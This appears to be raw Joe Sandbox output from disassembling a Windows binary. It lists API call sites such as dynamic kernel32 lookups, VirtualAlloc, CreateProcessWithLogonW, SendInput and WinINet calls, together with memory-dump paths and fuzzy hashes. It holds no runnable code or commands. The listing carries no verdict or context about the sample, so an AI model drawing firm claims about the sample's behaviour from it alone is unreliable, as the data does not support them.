                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C20EC,?,007BF751), ref: 007C2104
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 007C2116
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-399901964
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0077E6D9,0000000C,0077E55B,007FDC28,?,?), ref: 0077E6F1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0077E703
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0077E69C,?,0077E43F), ref: 0077E6B4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0077E6C6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007BEBAF,?,007BEAAC), ref: 007BEBC7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007BEBD9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,007A135F,?,007A1440), ref: 007A1389
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007A139B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007A1371,?,007A1519), ref: 007A13B4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007A13C6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,007C3AC2,?,007C29F5), ref: 007C3ADA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007C3AEC
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,007B6AA6), ref: 0076AB2D
                                                                                                                                        • _wcscmp.LIBCMT ref: 0076AB49
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper_wcscmp
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 007C0D85
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 007C0DC8
                                                                                                                                          • Part of subcall function 007C0458: CharLowerBuffW.USER32(?,?,?,?), ref: 007C0478
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007C0FB2
                                                                                                                                        • _memmove.LIBCMT ref: 007C0FC2
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007BAF56
                                                                                                                                        • CoUninitialize.COMBASE ref: 007BAF61
                                                                                                                                          • Part of subcall function 007A1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007A10B8
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BAF6C
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007BB23F
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007CC354
                                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 007CC384
                                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 007CC3EA
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0079D258
                                                                                                                                        • __itow.LIBCMT ref: 0079D292
                                                                                                                                          • Part of subcall function 0079D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0079D549
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0079D2FB
                                                                                                                                        • __itow.LIBCMT ref: 0079D350
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                        • Opcode ID: 84e77ca885831206d03bd29f1b22cc87f76265f177fb1939fc106963d22aa469
                                                                                                                                        • Instruction ID: 8b51b8668285d2b842fdeca954e39de5bf35e989a785ecfe8e510c8d49d9cb00
                                                                                                                                        • Opcode Fuzzy Hash: 84e77ca885831206d03bd29f1b22cc87f76265f177fb1939fc106963d22aa469
                                                                                                                                        • Instruction Fuzzy Hash: 7C41B871A00309EFDF25EF54D856BEE7BB9AF49710F000015FA06A7291DB789E45CB51
                                                                                                                                        APIs
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007AEF32
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 007AEF58
                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007AEF7D
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007AEFA9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                        • Opcode ID: 96fc15dba013367f147552279efa0b30f223ec408d5f98a313790c3f6fee0585
                                                                                                                                        • Instruction ID: d9a7520353820d78ab8e52cc4ac6c36a6ccf6137e51696e5aee4cdc015f33736
                                                                                                                                        • Opcode Fuzzy Hash: 96fc15dba013367f147552279efa0b30f223ec408d5f98a313790c3f6fee0585
                                                                                                                                        • Instruction Fuzzy Hash: E4415F35600651DFCB11EF19C588A59BBE5EF89320B19C488ED4AAF762CB38FD41CB91
                                                                                                                                        APIs
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007CB3E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                        • Opcode ID: 7b5eeb4d7a18162442920f57d827773368723834695b340213f9f520ac5204ca
                                                                                                                                        • Instruction ID: 9f72ff5fb2e5218d4983c5e749d9a807bb8f4045fbaca0f531f493be474909bd
                                                                                                                                        • Opcode Fuzzy Hash: 7b5eeb4d7a18162442920f57d827773368723834695b340213f9f520ac5204ca
                                                                                                                                        • Instruction Fuzzy Hash: 3131E434604284FBEF389F58DC8BFA83765EB0A350F20811EFA51DA1A2C739DA419B51
                                                                                                                                        APIs
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CD617
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007CD68D
                                                                                                                                        • PtInRect.USER32(?,?,007CEB2C), ref: 007CD69D
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 007CD70E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                        • Opcode ID: 55d3b6c8c6b836e2bb1830ad17da1f324c79c7f19351f3db35b2d0c80cb307c7
                                                                                                                                        • Instruction ID: fe79399b9ebffb33ece54b2db2f714237e329762ceb0e5de1b3b04d92587f808
                                                                                                                                        • Opcode Fuzzy Hash: 55d3b6c8c6b836e2bb1830ad17da1f324c79c7f19351f3db35b2d0c80cb307c7
                                                                                                                                        • Instruction Fuzzy Hash: 34415A34A00118EFCB21DF58D884FA97BF5BB49350F2481BEE409AB251D738EC42DB50
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 007A44EE
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 007A450A
                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007A456A
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 007A45C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 139b7f27e4bfe7690be09b82d23e2a6b6a122bb1485c89fc79cff0e97d525ab5
                                                                                                                                        • Instruction ID: 0590fe9695013a8022f38ac2271e26d33a7928bc460eb400a3214739aa9ba02e
                                                                                                                                        • Opcode Fuzzy Hash: 139b7f27e4bfe7690be09b82d23e2a6b6a122bb1485c89fc79cff0e97d525ab5
                                                                                                                                        • Instruction Fuzzy Hash: C9310671D00298AFEF348B6488187BE7BA5ABCB310F04035AF081571C1C7BE9E64DB62
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00794DE8
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00794E16
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00794E44
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00794E7A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: 0a41814eb24067c8f57837887c1ccd659dddb37ab41868bc01a75cc1c36fe970
                                                                                                                                        • Instruction ID: 3440318cdbc300e871f5862a3dd66a82cf667f8225d246733d066b03f1fa2be3
                                                                                                                                        • Opcode Fuzzy Hash: 0a41814eb24067c8f57837887c1ccd659dddb37ab41868bc01a75cc1c36fe970
                                                                                                                                        • Instruction Fuzzy Hash: B631AB31600246AFDF219F74DC49FBA7BAABF41310F158528E8218B1A0E738EC52DB90
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007C7AB6
                                                                                                                                          • Part of subcall function 007A69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 007A69E3
                                                                                                                                          • Part of subcall function 007A69C9: GetCurrentThreadId.KERNEL32 ref: 007A69EA
                                                                                                                                          • Part of subcall function 007A69C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 007A69F1
                                                                                                                                        • GetCaretPos.USER32(?), ref: 007C7AC7
                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 007C7B00
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007C7B06
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B49B7
                                                                                                                                          • Part of subcall function 007B4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B4A60
                                                                                                                                          • Part of subcall function 007B4A41: InternetCloseHandle.WININET(00000000), ref: 007B4AFD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1463438336-0
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0079BCD9
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0079BCE0
                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 0079BCFA
                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079BD29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2621361867-0
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 007C88A3
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C88BD
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C88CB
                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007C88D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                        APIs
                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007B906D
                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007B907F
                                                                                                                                        • accept.WS2_32(00000000,00000000,00000000), ref: 007B908C
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B90A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 385091864-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007A18FD,?,?,?,007A26BC,00000000,000000EF,00000119,?,?), ref: 007A2CB9
                                                                                                                                          • Part of subcall function 007A2CAA: lstrcpyW.KERNEL32(00000000,?,?,007A18FD,?,?,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A2CDF
                                                                                                                                          • Part of subcall function 007A2CAA: lstrcmpiW.KERNEL32(00000000,?,007A18FD,?,?,?,007A26BC,00000000,000000EF,00000119,?,?), ref: 007A2D10
                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A1916
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A193C
                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,007A26BC,00000000,000000EF,00000119,?,?,00000000), ref: 007A1970
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                        • String ID: cdecl
                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00793D65
                                                                                                                                          • Part of subcall function 007845EC: __FF_MSGBANNER.LIBCMT ref: 00784603
                                                                                                                                          • Part of subcall function 007845EC: __NMSG_WRITE.LIBCMT ref: 0078460A
                                                                                                                                          • Part of subcall function 007845EC: RtlAllocateHeap.NTDLL(01170000,00000000,00000001), ref: 0078462F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                        • Opcode ID: 35feb195390eb7d92026e53e75094bf89da9af66a895f9ad01f455c55cbaabf6
                                                                                                                                        • Instruction ID: ab1307a13e3d7bba04db162a001be089a97071271231817bf117af4f41910a21
                                                                                                                                        • Opcode Fuzzy Hash: 35feb195390eb7d92026e53e75094bf89da9af66a895f9ad01f455c55cbaabf6
                                                                                                                                        • Instruction Fuzzy Hash: 08110632A45611EBDF313F70BC586AA3B98BF04361F508525F909DA292DF3C8E408751
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007A715C
                                                                                                                                        • _memset.LIBCMT ref: 007A717D
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007A71CF
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007A71D8
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1157408455-0
                                                                                                                                        • Opcode ID: 1a40e23e120d5b99114f01d0a1e9b0f712ba5d9372fe438f4e097761ee5a0d4e
                                                                                                                                        • Instruction ID: b6de81a9830d0da77ddf278591cbcba3c88bf6f5ef309c9b822aac557de4701b
                                                                                                                                        • Opcode Fuzzy Hash: 1a40e23e120d5b99114f01d0a1e9b0f712ba5d9372fe438f4e097761ee5a0d4e
                                                                                                                                        • Instruction Fuzzy Hash: 1011CD7190122C7AD7305B65AC4DFEBBABCEF45760F104299F504E71D0D2744E80CB68
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007A13EE
                                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007A1409
                                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007A141F
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 007A1474
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3137044355-0
                                                                                                                                        • Opcode ID: 3ec6a456c84d9e115e212dd68ee633e026c9bbbf460737090d0d11feb047b4bf
                                                                                                                                        • Instruction ID: c33133ad019dfc0b1ff4f78bacba5954c6066544c5ab562e35489c57634d22cd
                                                                                                                                        • Opcode Fuzzy Hash: 3ec6a456c84d9e115e212dd68ee633e026c9bbbf460737090d0d11feb047b4bf
                                                                                                                                        • Instruction Fuzzy Hash: 2C21D371500349EFEB20DF94DC88ADABBBCEF49744F80866DA5229B410D778EA04DF51
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0079C285
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079C297
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079C2AD
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079C2C8
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 6d1924acf183da33e85203f1ce37e5a8dfe40da8c5b0ef56d38719ced645a9f1
                                                                                                                                        • Instruction ID: 5f5009971978fecd8b46afbf92d9733f118ddf01187e837e6608785313eb1f39
                                                                                                                                        • Opcode Fuzzy Hash: 6d1924acf183da33e85203f1ce37e5a8dfe40da8c5b0ef56d38719ced645a9f1
                                                                                                                                        • Instruction Fuzzy Hash: 1611187A940218FFDF11DBD8D885E9DBBB4FB08750F204091EA04B7294D671AE10DB94
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 007A7C6C
                                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 007A7C9F
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007A7CB5
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007A7CBC
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                        • Opcode ID: f72fe8f5372f04b9f8d4698aa30b2ba15e4606b1455e0211650519127f0437b9
                                                                                                                                        • Instruction ID: dab585e5816961efc6d0ade14146236feb3c25fe081b786f027e2a70eb1fcefa
                                                                                                                                        • Opcode Fuzzy Hash: f72fe8f5372f04b9f8d4698aa30b2ba15e4606b1455e0211650519127f0437b9
                                                                                                                                        • Instruction Fuzzy Hash: D1116B72A05248BFC721AFACDC48A9A7FADAF49320F008395F424D3251D6788D04C778
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                        • Opcode ID: b085258ad5b77a2646d7e3eda3ff4c8ef8dbb643bf8bd3ad888470f3fa16a770
                                                                                                                                        • Instruction ID: eacae0f23d7f7fcadee9fd4a1c9102786b873c158248869100eee7e5dc259dee
                                                                                                                                        • Opcode Fuzzy Hash: b085258ad5b77a2646d7e3eda3ff4c8ef8dbb643bf8bd3ad888470f3fa16a770
                                                                                                                                        • Instruction Fuzzy Hash: A9118472501559BFDF124FA09CC5EEA7B69FF0D394F058119FA1896110C73ADC60DBA4
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 007A49EE
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 007A4A13
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 007A4A1D
                                                                                                                                        • Sleep.KERNEL32(?), ref: 007A4A50
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2875609808-0
